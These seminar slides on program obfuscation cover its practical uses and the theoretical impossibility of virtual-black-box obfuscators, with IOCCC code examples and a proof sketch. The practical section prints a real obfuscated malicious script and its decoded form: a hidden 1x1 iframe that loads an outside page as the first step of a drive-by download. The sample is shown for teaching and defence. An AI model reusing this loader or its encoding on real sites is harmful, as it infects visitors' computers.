Seminar in Cryptographic Protocols: Program Obfuscation
Omer Singer, June 8, 2009

Practical Background
What is program obfuscation?
• Obfuscation is deliberately making software code so confusing that even those with access to the code can’t figure out what a program is going to do.
• “The art of making things appear more complicated”
What does this function do? Source: http://www.oreillynet.com/pub/a/mac/2005/04/08/code.html
Three main values:
• Potency
• Resilience
• Cost
Many methods in use:
• Modify variable names and layout
• Replace integer values with complex equations
• Change program flow
• Modify data structures
• Anti-disassembly (“armored” viruses)
• Anti-debugging
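The first three methods in the list can be sketched on a toy function. This is a hand-made illustration, not the output of any real obfuscation tool; the function `is_leap_year` and the names `O0`, `l1`, `lI`, `Il`, `ll`, `I1`, and `l` are hypothetical and chosen only to be hard to tell apart.

```python
def is_leap_year(year: int) -> bool:
    """Readable original."""
    return year % 4 == 0 and (year % 100 != 0 or year % 400 == 0)


def O0(l1: int) -> bool:
    """Same behaviour after three hand-applied transformations."""
    # Integer values replaced by expressions: 4, 100 and 400.
    lI, Il, ll = 1 << 2, 10 * 10, 20 ** 2
    # Program flow changed: the boolean expression becomes a state machine.
    I1, l = 0, False
    while I1 != 3:
        if I1 == 0:
            I1 = 1 if l1 % lI == 0 else 3
        elif I1 == 1:
            if l1 % Il != 0:
                l, I1 = True, 3
            else:
                I1 = 2
        else:  # state 2: divisible by 100, so the 400 rule decides
            l, I1 = (l1 % ll == 0), 3
    return l


# Both versions agree on every year checked here.
print(all(is_leap_year(y) == O0(y) for y in range(1, 3000)))
```

The second version is more "potent" in the sense that a reader needs longer to understand it, but it also costs extra lines and a loop, which is the trade-off the three values describe.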
Winner of the International Obfuscated C Code Contest (IOCCC) in 1996
The program shows the time on a clock with a configurable face and style.
Winner of the international C obfuscation contest in 2001 #include <unistd.h> #include <curses.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #include <sys/time.h> #define o0(M,W) mvprintw(W,M?M-1:M,"%s%s ",M?" ":"",_) #define O0(M,W) M##M=(M+=W##M)-W##M #define l1(M,W) M.tv_##W##sec #define L1(m,M,l,L,o,O) for(L=l;L--;)((char*)(m))[o]=((char*)(M))[O] #define I1 lL,(structsockaddr*)&il #define i1 COLS #define j LINES #define L_ ((j%2)?j:j-1) fd_setI;structsocka\ ddr_inil;struct host\ ent*LI; structtimevalIL,l;char L[9],_[1<<9] ;void ___(int __ ){_[__--]=+0;if( ++__)___(--__);_ [__]='=';}double o,oo=+0,Oo=+0.2; long O,OO=0,oO=1 ,ii,iI,Ii,Ll,lL, II=sizeof(il),Il ,ll,LL=0,i=0,li, lI;int main(int\ iL,char *Li[]){\ initscr();cbreak ();noecho();nonl ();___(lI=i1/4); _[0]='[';_[lI-1] =']';L1(&il,&_,\ II,O,+O,+lI);il. sin_port=htons(( unsigned long)(\ PORT&0xffff));lL =l_;if(iL=!--iL) {il. sin_addr .\ s_addr=0;bind(I1 ,II);listen(lL,5 );lL=accept(I1,& II);}else{oO-=2; LI=gethostbyname (Li[1]);L1(&(il. sin_addr),(*LI). h_addr_list[0],\ LI->h_length,iI, iI,iI);(*(&il)). 
sin_family=(&(*\ LI))->h_addrtype ;connect(I1,II); }ii=Ii=(o=i1*0.5 )-lI/2;iI=L_-1;O =li=L_*0.5;while (_){mvaddch(+OO, oo,' ');o0(ii,iI );o0(Ii,Il-=Il); mvprintw(li-1,Il ,"%d\n\n%d",i,LL );mvhline(li,+0, '-',i1);mvaddch( O,o,'*');move(li ,Il);refresh();\ timeout(+SPEED); gettimeofday(&IL ,+0);Ll=getch(); timeout(0);while (getch()!=ERR);\ if(Ll=='q'&&iL)\ write(lL,_+1,1); if(ii>(ll=0)&&Ll ==','){write(lL, _,-(--Il));}else if(Ll=='.'&&ii+\ lI<i1){write(lL, _+lI,++Il);}else if(iL||!Il)write (lL,_+lI-1,4-3); gettimeofday(&l, 0);II=((II=l1(IL ,)+(l1(l,u)-=l1( IL,u))-l1(l,)+(\ l1(l,)-=l1(IL,)) )<0)?1+II-l1(l,) +1e6+(--l1(l,)): II;usleep((II+=\ l1(l,)*1e6-SPEED *1e3)<0?-II:+0); if(Ll=='q'&&!iL) break;FD_ZERO(&I );FD_SET(lL,&I); memset(&*&IL,ll, sizeof(l));if((\ Ll=select(lL+1,& I,0,0,&IL)));{if (read(lL,&L,ll+1 )){if(!*L){ll++; }else if(*L==ll[ _]){ll--; }else\ if(*(&(*L))==1[_ ]){break;}}else{ break;}}O0(o,O); O0(O,o);if(o<0){ o*=-1;Oo*=-1;}if (o>i1){o=i1+i1-o ;Oo*=-1;}if(o>=( Ii+=ll)&&O<1&&oO <0&&o<Ii+lI){O=2 ;oO=~--oO;Oo+=ll *4e-1;}if(O<0){O =iI;LL++;}if(o>= (ii+=Il)&&O>iI-1 &&oO>0&&o<ii+lI){O=iI- 2;oO=~--oO;Oo+=Il*4e-1 ;}if(+O>+iI){O-=O;i++; }}endwin();return(0);} Network-based Pong game
Actual web code blocked by an Intrusion Prevention System at a client: <Script Language='Javascript'> <!-- document.write(unescape('%3C%48%54%4D%4C%3E%0A%3C%48%45%41%44%3E%0A%3C%54%49%54%4C%45%3E%3C%2F%54%49%54%4C%45%3E%0A%3C%2F%48%45%41%44%3E%0A%3C%42%4F%44%59%20%6C%65%66%74%6D%61%72%67%69%6E%3D%30%20%74%6F%70%6D%61%72%67%69%6E%3D%30%20%72%69%67%68%74%6D%61%72%67%69%6E%3D%30%20%62%6F%74%74%6F%6D%6D%61%72%67%69%6E%3D%30%20%6D%61%72%67%69%6E%68%65%69%67%68%74%3D%30%20%6D%61%72%67%69%6E%77%69%64%74%68%3D%30%3E%0A%0A%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%65%66%73%6F%69%70%61%61%77%61%2E%63%6F%6D%2F%65%77%69%6F%71%61%2F%22%3E%3C%49%4D%47%20%73%72%63%3D%22%62%61%6E%6E%65%72%32%2E%67%69%66%22%20%77%69%64%74%68%3D%22%33%30%32%22%20%68%65%69%67%68%74%3D%22%32%35%32%22%20%62%6F%72%64%65%72%3D%22%30%22%3E%3C%2F%61%3E%0A%0A%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6C%78%63%7A%78%6F%2E%69%6E%66%6F%2F%6D%70%2F%69%6E%2E%70%68%70%22%20%77%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D%22%31%22%20%46%52%41%4D%45%42%4F%52%44%45%52%3D%22%30%22%20%53%43%52%4F%4C%4C%49%4E%47%3D%22%6E%6F%22%3E%3C%2F%69%66%72%61%6D%65%3E%0A%0A%0A%3C%2F%42%4F%44%59%3E%0A%3C%2F%48%54%4D%4C%3E')); //--> </Script>
When deobfuscated…
<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<BODY leftmargin=0 topmargin=0 rightmargin=0 bottommargin=0 marginheight=0 marginwidth=0>
<a href="http://www.efsoipaawa.com/ewioqa/"><IMG src="banner2.gif" width="302" height="252" border="0"></a>
<iframe src="http://lxczxo.info/mp/in.php" width="1" height="1" FRAMEBORDER="0" SCROLLING="no"></iframe>
</BODY>
</HTML>
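The encoding used by the blocked script is plain percent-encoding of every byte, so it can be reversed without running the JavaScript. The sketch below uses Python's standard `urllib.parse.unquote` as a stand-in for the browser's `unescape` (the two agree for ASCII `%XX` sequences) and decodes only the first few bytes of the string; the helper `percent_encode_all` is a hypothetical name for the reverse direction.

```python
from urllib.parse import unquote

# First two tags of the blocked payload, copied from the encoded string.
encoded = "%3C%48%54%4D%4C%3E%0A%3C%48%45%41%44%3E"

decoded = unquote(encoded)
print(decoded)


def percent_encode_all(text: str) -> str:
    """Encode every byte as %XX, the way the attacker's script was prepared."""
    return "".join(f"%{byte:02X}" for byte in text.encode("ascii"))


# Round trip: encoding the decoded text gives back the original string.
print(percent_encode_all(decoded) == encoded)
```

Because decoding is this cheap, such encoding mostly defeats simple signature matching on the page source rather than a human analyst.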
Obfuscation helps malware bypass antivirus software and delays the response of security researchers
• Obfuscated web code is often the first step in a “drive-by download” attack
• When the browser executes the web code, the code calls programs that target local software
• The result is infection of the user’s computer
Google Search Results Containing a Harmful URL Source: http://viruslist.com/en/analysis?pubid=204792056
Attempt to calculate impact of obfuscated online attacks:
• $13.2 billion direct damages of malware [1]
• 74% of malware spread via compromised websites [2]
• 80% of browser-based attacks are now obfuscated [3]
• $13.2 billion × 74% × 80% ≈ $7.8 billion
[1] http://www.itu.int/ITU-D/cyb/cybersecurity/docs/itu-study-financial-aspects-of-malware-and-spam.pdf
[2] http://viruslist.com/en/analysis?pubid=204792056
[3] http://www.securityfocus.com/brief/846
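The estimate is the product of the three figures above. A quick check of the arithmetic, with hypothetical variable names, and with the assumption (implicit in the slide) that the two percentages can simply be multiplied:

```python
direct_damages_bn = 13.2   # direct damages of malware, in billions of USD
share_via_websites = 0.74  # share of malware spread via compromised websites
share_obfuscated = 0.80    # share of browser-based attacks that are obfuscated

estimate_bn = direct_damages_bn * share_via_websites * share_obfuscated
print(f"${estimate_bn:.1f} billion")  # $7.8 billion
```

The unrounded product is about 7.81, so the slide's figure is rounded down slightly.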
Knowing is half the battle…
A few tips to stop obfuscated “drive-by download” attacks:
• Use NoScript to block active content in Firefox
• Don’t click on web ads
• Keep client-side software updated: Adobe Reader, Flash Player, Apple QuickTime, etc.
Preventing source code theft
• Disrupt reverse engineering
• Block code copying
• Especially important with the increased use of Java and .NET languages such as C# and Visual Basic, which compile to intermediate bytecode rather than machine code and are therefore easier to decompile
• Microsoft recommends obfuscating ASP files in case of server compromise
• Watermarking and Digital Rights Management (DRM)
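Why bytecode is easy to reverse can be illustrated with Python, whose compiled functions also carry bytecode and a constant table. This is an analogy only, not a Java or .NET decompiler; `check_license` and the key string are hypothetical.

```python
import dis


def check_license(key: str) -> bool:
    """Hypothetical license check with the secret embedded in the code."""
    return key == "HYPOTHETICAL-KEY-1234"


# The compiled function exposes its constants without any source code.
recovered = [c for c in check_license.__code__.co_consts if isinstance(c, str)]
print(recovered)

# The instruction stream is equally accessible.
dis.dis(check_license)
```

Anyone holding the compiled function can read the embedded string, which is the kind of exposure that obfuscators for bytecode-based languages try to reduce.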
“If obfuscation technology was ever perfected we would have perfect DRM and perfect malware. Yet, that outcome is unlikely. The computer ultimately has to decipher and follow a software program’s true instructions. Each new obfuscation technique has to abide by this requirement and, thus, will be able to be reverse engineered.”
- Chris Wysopal, “Good Obfuscation, Bad Code”
Oracle Access
• Used by [B+] to model what an adversary can do
• The oracle computes some function f
• The adversary sends a query q to the oracle and receives the answer f(q)
• Useful when studying obfuscation: the oracle serves as an interface to the program without exposing its contents
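The query-and-answer interface described above can be sketched as a wrapper that only ever returns f(q). The names `make_oracle` and `secret_program` are hypothetical, and a Python closure does not truly hide its contents (introspection can reach them), so this models the interface rather than any security guarantee.

```python
from typing import Callable, List, Tuple


def make_oracle(f: Callable[[int], int]) -> Tuple[Callable[[int], int], List[int]]:
    """Return an oracle for f plus a log of the queries made to it."""
    queries: List[int] = []

    def oracle(q: int) -> int:
        queries.append(q)   # the oracle sees each query
        return f(q)         # the adversary sees only the answer f(q)

    return oracle, queries


def secret_program(x: int) -> int:
    """Stand-in for the program whose contents stay hidden."""
    return (x * x + 7) % 11


oracle, log = make_oracle(secret_program)
answers = [oracle(q) for q in range(3)]
print(answers)  # [7, 8, 0]
print(log)      # [0, 1, 2]
```

An adversary limited to this interface learns the function only point by point, one query at a time.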
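Adversary with Oracle Access
[Figure: the adversary sends a query q to the oracle, which passes q to the program; the program’s answer f(q) returns to the adversary through the oracle.]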
Virtual Black Box
Anything one can efficiently compute from an obfuscated program (the “virtual black box”), one should be able to efficiently compute given just oracle access to the program. In other words, for any adversary A there exists a simulator S such that whatever A can learn given an obfuscated program, S can learn from oracle access to that program.
• Speaks Spanish
• Answers in the form of a question
q: “Tell me about yourself”
f(q): “¿Qué quieres saber?”
• Adversary A: has access to the virtual black box (the obfuscated program)
• Simulator S: has only oracle access to the function
Circuit
In the [B+] paper on obfuscation, a circuit stands in for a program with a fixed, finite input length, whereas a Turing machine accepts inputs of any length.
• Circuits are easier to put in a virtual black box.
• Therefore obfuscating circuits is easier than obfuscating TMs.
• The [B+] paper first proves its theorems for TMs and then extends them to circuits.
Obfuscators
• An obfuscator is an algorithm O that transforms a program P into an equivalent program O(P) while restricting what an adversary can learn about P given O(P).
What is the adversary trying to achieve?
• Construct a program that produces the same output as P
• Construct a program that produces output with some relation to the output of P
• Compute some function of P
• Decide some property of P
The last goal is the weakest, so hiding it is the least an obfuscator must do; we want to prove that even this is impossible.
TM Obfuscator A probabilistic algorithm O is a TM obfuscator if the following conditions hold…
Functionality: For every Turing machine M, the string O(M) describes a Turing machine that computes the same function as M.
Polynomial slowdown: The description length and running time of O(M) are at most polynomially larger than those of M.
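“Virtual black box” property: For any probabilistic polynomial-time (PPT) adversary A, there is a PPT simulator S and a negligible function α such that for all TMs M, where $S^{M}$ denotes S with oracle access to M:
$$\left|\Pr[A(O(M)) = 1] - \Pr[S^{M}(1^{|M|}) = 1]\right| \le \alpha(|M|)$$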
Circuit Obfuscator
• Same idea as a TM obfuscator, but intuitively easier, since a circuit computes a function on inputs of a particular length
• Hence the proposition: if a TM obfuscator exists, then a circuit obfuscator exists
• Thus if we prove impossibility for circuit obfuscators, impossibility of TM obfuscators follows
Unobfuscatable Circuit Ensemble
• A family of circuits such that:
  • Every circuit c in the family is efficient
  • There exists a predicate π(c) such that:
    • π(c) is hard to compute with oracle access to the function that c computes
    • π(c) is easy to compute with access to any circuit c’ that computes the same function as c
Main Proof Structure
[B+] structure their proof of the main impossibility result as follows:
• Define obfuscators that are secure when applied to two programs
• Show that such obfuscators do not exist
• Modify the construction to prove that TM/circuit obfuscators do not exist
• Show how this proof yields an unobfuscatable function ensemble
2-TM Obfuscator A 2-TM obfuscator is defined the same as a TM obfuscator but with a strengthened “virtual black box property”: the adversary has access to two obfuscated Turing machines.
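Formal definition of the strengthened “virtual black box” property: for any PPT A, there is a PPT S and a negligible function α such that for all TMs M and N:
$$\left|\Pr[A(O(M), O(N)) = 1] - \Pr[S^{M,N}(1^{|M|+|N|}) = 1]\right| \le \alpha(\min\{|M|, |N|\})$$
• First term: adversary with access to two obfuscated TMs
• Second term: simulator with oracle access to the two TMs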
Proposition: 2-TM obfuscators do not exist.
According to [B+], “the essence of this proof is that there is a fundamental difference between getting oracle access to a function and getting the program that computes it, no matter how obfuscated”.
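Proof by contradiction…
• Suppose that there exists a 2-TM obfuscator O.
• Consider a function that cannot be learned by oracle queries, for example the following Turing machine, where $\alpha, \beta \in \{0,1\}^k$ are chosen at random: $C_{\alpha,\beta}(x) = \beta$ if $x = \alpha$, and $0^k$ otherwise.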
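• Define another Turing machine such that: $D_{\alpha,\beta}(C) = 1$ if $C(\alpha) = \beta$, and $0$ otherwise, where α and β are the random strings that define the first machine.
• Consider an adversary A such that: A(C, D) = D(C)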
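Given the obfuscated pair, A outputs 1 when the first program is $C_{\alpha,\beta}$ and 0 when it is $Z_k$, the machine that always outputs $0^k$. Therefore S with oracle access to $C_{\alpha,\beta}$ and $D_{\alpha,\beta}$ must output 1, and with oracle access to $Z_k$ and $D_{\alpha,\beta}$ must output 0. But S cannot differentiate between the two cases, because the oracles differ only on inputs that require guessing α, so we have a contradiction.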
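The gap between holding a program and querying it can be sketched in a few lines. This is a toy model under stated assumptions: Python functions stand in for Turing machines, integers stand in for k-bit strings, `Z` is the all-zero machine, and `oracle_only_guess` is a hypothetical stand-in for a simulator that may only query its oracles. The value K = 64 and the seed are arbitrary choices for the demonstration.

```python
import random

K = 64                      # security parameter in bits (arbitrary choice)
rng = random.Random(2009)   # seeded only to make the demo repeatable


def make_C(alpha, beta):
    """C(x) = beta if x == alpha, else 0."""
    return lambda x: beta if x == alpha else 0


def make_D(alpha, beta):
    """D(C) = 1 if C(alpha) == beta, else 0; its input is a program."""
    return lambda C: 1 if C(alpha) == beta else 0


def Z(x):
    """The all-zero machine."""
    return 0


def adversary(C, D):
    """A(C, D) = D(C): possible only when A holds code for C."""
    return D(C)


def oracle_only_guess(c_oracle, d_oracle, queries=1000):
    """Try to tell C from Z using oracle queries alone."""
    for _ in range(queries):
        x = rng.getrandbits(K)
        if c_oracle(x) != 0:          # succeeds only if x == alpha
            return 1
        if d_oracle(make_C(x, rng.getrandbits(K))) == 1:  # needs both guesses right
            return 1
    return 0


alpha = rng.getrandbits(K)
beta = rng.getrandbits(K) | 1   # nonzero, so C differs from Z at alpha
C, D = make_C(alpha, beta), make_D(alpha, beta)

print(adversary(C, D), adversary(Z, D))   # 1 0
print(oracle_only_guess(C, D), oracle_only_guess(Z, D))
```

With 1000 random queries out of 2^64 possible inputs, the oracle-only procedure almost certainly returns the same answer in both cases, while the adversary holding the programs always tells them apart.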
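Recall that a 2-TM obfuscator O is defined with the “virtual black box” property that, for all TMs M and N:
$$\left|\Pr[A(O(M), O(N)) = 1] - \Pr[S^{M,N}(1^{|M|+|N|}) = 1]\right| \le \alpha(\min\{|M|, |N|\})$$
The combination of the following equations contradicts the fact that O is a 2-TM obfuscator, where $C_{\alpha,\beta}$ and $D_{\alpha,\beta}$ are the two machines defined above and $Z_k$ always outputs $0^k$:
$$\Pr[A(O(C_{\alpha,\beta}), O(D_{\alpha,\beta})) = 1] = 1$$
$$\Pr[A(O(Z_k), O(D_{\alpha,\beta})) = 1] \le 2^{-k}$$
$$\left|\Pr[S^{C_{\alpha,\beta}, D_{\alpha,\beta}}(1^k) = 1] - \Pr[S^{Z_k, D_{\alpha,\beta}}(1^k) = 1]\right| \le 2^{-\Omega(k)}$$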
In the [B+] paper, the proof that 2-TM obfuscators do not exist is extended to show that 2-circuit obfuscators also do not exist.